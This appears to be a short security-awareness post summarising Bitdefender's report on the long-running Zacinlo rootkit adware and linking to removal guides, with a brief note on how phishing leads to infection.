The security vendor BitDefender has published a 104 page report detailing spyware (defined) which uses rootkit functionality (defined). This malware is noteworthy due to its longevity (dating back to 2012) and its ability to install even on modern versions of Windows e.g. Windows 10:

Six Years and Counting: Inside the Complex Zacinlo Ad Fraud Operation: BitDefender Labs

=================
On a side note I am not too surprised this infection can persist on Windows 10. If a user is tricked into running malware e.g. by clicking a link or opening an attachment, either of which can be contained in a phishing (defined) email or an even more convincing spear phishing (defined) email from an organization or colleague you trust, strong defences won’t always keep you from becoming infected.

The BitDefender report can be downloaded from the above link (it does not request any personal information).

=================
The following news article links to 2 detailed but still easy to follow removal guides. If you are experiencing unwanted adverts showing within websites that don’t usually show them (even though you are using an ad blocker) or are experiencing redirects, namely you wish to visit website A but are actually sent to website B, please follow these guides to remove this malware:

Rootkit-Based Adware Wreaks Havoc Among Windows 10 Users in the US: BleepingComputer: by Catalin Cimpanu
=================

Thank you.